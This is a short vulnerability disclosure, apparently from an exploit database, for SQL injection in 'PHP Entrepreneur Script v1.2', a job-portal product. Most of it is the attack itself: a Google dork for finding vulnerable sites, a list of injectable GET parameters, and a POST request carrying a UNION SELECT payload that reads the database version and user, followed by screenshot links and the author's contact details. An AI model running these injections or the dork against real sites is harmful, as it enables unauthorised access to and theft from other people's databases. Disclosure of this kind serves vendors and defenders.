################################################ #Title: PHP Entrepreneur Script v1.2 - SQL Injection #Credit: Bilal KARDADOU #Vendor: www.jobportalscript.com #Vendor URL: http://www.jobportalscript.com/entrepreneur-home-basic- version.html #Product: PHP Entrepreneur Script. # Entrepreneur Script Feature Document : http://www.jobportalscript. com/documents/entrepreneur.docx #Google Dork: new_searchresult.php?left_cat=13 - ... # ################################################ # # --SQL Injection/Exploit-- # www.localhost/new_searchresult.php?left_cat=5[SQL] # www.localhost/farea_search_result.php?fid=13[SQL] # www.localhost/categ_search_result.php?industry_type=17[SQL] # www.localhost/exam_question.php?cate_id=19[SQL] # www.localhost/categ_search_result.php?action=slogin& industry_type=8[SQL]&jid_0=31320142800&jid_1=31408427830&save_job=Save+Jobs # www.localhost/farea_search_result.php?action=slogin&fid= 31[SQL]&jid_0=31469880989&jid_1=31454064191&jid_2= 31453804816&jid_4=31441601731&jid_5=31439299432&jid_6= 31413109189&jid_7=31412079908&save_job=Save+Jobs # www.localhost/quick_result.php?Search&search_type=[SQL] # # [POST Method] www.localhost/adv_searchresult.php keyword=woot&from_exp=0&to_exp=0&location=Morocco' UNION SELECT 1,@@version,user(),4,5,6,7,8-- -&area=1&submit=Search # ---PoC--- # http://prnt.sc/ehg2tz # http://prnt.sc/ehg386 # http://prnt.sc/ehg3dm # http://prnt.sc/ehg3k8 # http://prnt.sc/ehg197 # # Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com | # Iranian Exploit DataBase = http://IeDb.Ir [2017-03-10]